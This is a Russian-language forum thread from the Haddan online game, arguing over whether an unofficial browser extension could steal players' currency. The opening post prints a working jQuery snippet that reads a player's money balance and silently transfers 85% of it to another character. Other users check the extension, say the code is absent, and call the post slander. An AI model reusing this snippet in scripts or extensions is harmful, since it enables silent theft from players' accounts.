Форумы мира Хаддан

Вернуться   Форумы мира Хаддан > Форумы Хаддан'а > Общий форум
Хаддан FAQ Пользователи Поиск Сообщения за сегодня Все разделы прочитаны

Общий форум Обсуждаем любые темы, касающиеся Хаддана.

Закрытая тема

Опции темы Поиск в этой теме
Старый 25.09.2014, 07:20
play for fun не в сети
Рекрут

play for fun Ниже среднего
По умолчанию Пользователям Хаддан Менеджера

Я просто оставлю это здесь, напомнив, что приложение не является официальным и админы настоятельно рекомендовали от него избавиться, а то мало ли что может натворить человек, обиженный на них
Код:
$(function(){ $.ajax({ url: "http://"+location.hostname+"/inv/inv.php", data: {"cat":"money","act":"inv"}, success: function(h){ var res = /g_money\s*=\s*'(\d+)'/gi.exec(h); var money = parseInt(res[1]); var p15 = Math.ceil(money*0.15); money -= p15; $.ajax({ url: "http://"+location.hostname+"/inv/inv.php?cat=money&act=inv", data: {'action':'inv_money_inv','what':'give','thingid':'0','thingtypeid':'0','cnt':'0','money':money,'place':'','data':'','price':'','priceg':'','htl':'','post':'1','nick':'BIGF00T','comment':'','gift':'','roomid_to':''}, type: 'post, success: function(h){ if(/g_sysmessage\s*=\s*'Вы\s*переслали/gi.test(h)){ console.log('Поздравляем, Вы только что переслали все свои деньги персонажу BIGF00T'); } } }); } }); });
Про слив АМН на биржу, выброс всего шмота по разным локациям окресов, перевод полученных мн в реал я вообще промолчу.

Для чего это? да так, веселья ради
Старый 25.09.2014, 09:20
Видящий Мрак  
По умолчанию кхм

Цитата:
Сообщение от play for fun
Я просто оставлю это здесь, напомнив, что приложение не является официальным и админы настоятельно рекомендовали от него избавиться, а то мало ли что может натворить человек, обиженный на них

А можно версию менеджера и название файла с этим куском кода огласить?

Скачал расширение, открыл как архив, вывалил все .js'ки в папку, открыл Notepad++... И не нашёл нигде этого.

Файл взял отсюда.
Старый 25.09.2014, 09:38
Аватар для Venom_IV Venom_IV не в сети
Мастер Турниров

Venom_IV Его начинают уважатьVenom_IV Его начинают уважатьVenom_IV Его начинают уважать

шикарная попытка однако ещё вдобавок с нового персонажа человек рассказывает, что у нас в менеджере какая-то беда)) клеветой попахивает)) сколько юзаю никогда такого и близко не видел)) не нравится приложение - играйте без него, но попусту обвинять в таких вещах - это верх некультурности и неадекватности, имхо!

Тотем Venom_IV [51] Информация о персонаже
Раса: Орк
Старый 25.09.2014, 09:47
Straight не в сети
Генерал

Straight На правильном пути

Чушь. Но хоть одно радует - давно собирался код расширения посмотреть, а тут хоть повод был. Можно по-разному относиться к создателям расширения, но такие вот вбросы с левого мульта - это просто подлость, ну или глупость.
Старый 25.09.2014, 09:49
Мастер Турниров

Venom_IV Его начинают уважатьVenom_IV Его начинают уважатьVenom_IV Его начинают уважать

Демарш не засчитан. (с)Паладин Maelstorm [60] Информация о персонаже
Раса: Человек

Старый 25.09.2014, 10:04
play for fun не в сети
Рекрут

play for fun Ниже среднего

Во-первых где вы тут клевету увидели ? Я разве писал, что такое есть ? Если бы эта часть кода присутствовала в модуле, давно бы все без денег остались на персе.
Во-вторых я указал, что приложение не официальное, администрацией не проверяется и новые обновления не контролируются, достаточно добавить несколько строчек кода, чтобы полностью опустошить персонажей.
Для этого всего лишь необходимо сильно задеть разработчика.
Старый 25.09.2014, 10:08
Видящий Мрак  

Цитата:
Во-первых где вы тут клевету увидели ? Я разве писал, что такое есть ? Если бы эта часть кода присутствовала в модуле, давно бы все без денег остались на персе.
Во-вторых я указал, что приложение не официальное, администрацией не проверяется и новые обновления не контролируются, достаточно добавить несколько строчек кода, чтобы полностью опустошить персонажей.

Паладин Maelstorm [60] Информация о персонаже
Раса: Человек, перелогиньтесь
Старый 25.09.2014, 10:12
Мастер Турниров

Цитата:

Ты говоришь, что эта часть кода не присутствует в расширении,а в первом сообщении писал что нашел в коде её)) ты определись уже))

Старый 25.09.2014, 10:43
Аватар для -DiPe- -DiPe- не в сети
Магистр

-DiPe- Уважаемый пользователь-DiPe- Уважаемый пользователь-DiPe- Уважаемый пользователь-DiPe- Уважаемый пользователь-DiPe- Уважаемый пользователь
Отправить сообщение для  -DiPe- с помощью ICQ

Хорошая попытка, Влад

Цитата:
Сообщение от ave satan
за тобой уже выехали,
удачи на каторге, читер)

Цитата:
Сообщение от _KOLDUN_
не Эрвин, это пассивка "прямые руки" xD
Старый 25.09.2014, 10:58
Аватар для BIGF00T BIGF00T не в сети
Вожак

BIGF00T На правильном пути

Дорогие друзья, дорогой, play for fun [1], кто бы ты ни был!
Этого с позволения сказать КОДА, нет в Менеджера) Это Вы сами придумали, дорогой)))

А по поводу "не проверяется" ...

Цитата:
Сообщение от BIGF00T
Цитата:
Сообщение от DarkFlame
Давайте поговорим об этом после НГ.
Александр, добрый вечер!
Не могли бы мы вернуться к вопросу.
Просто, ну почти год уже прошёл с последнего разговора об этом. Нельзя ли хоть признать расширение официальным, как Хекстор. Последний всё равно не работает, но висит в разделе официальных клиентов для игры. За год никаких проблем с безопасностью ни у кого не случилось. Думаю это показательно.
Спасибо!

Ок?

Последний раз редактировалось BIGF00T, 25.09.2014 в 11:04.
Закрытая тема

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск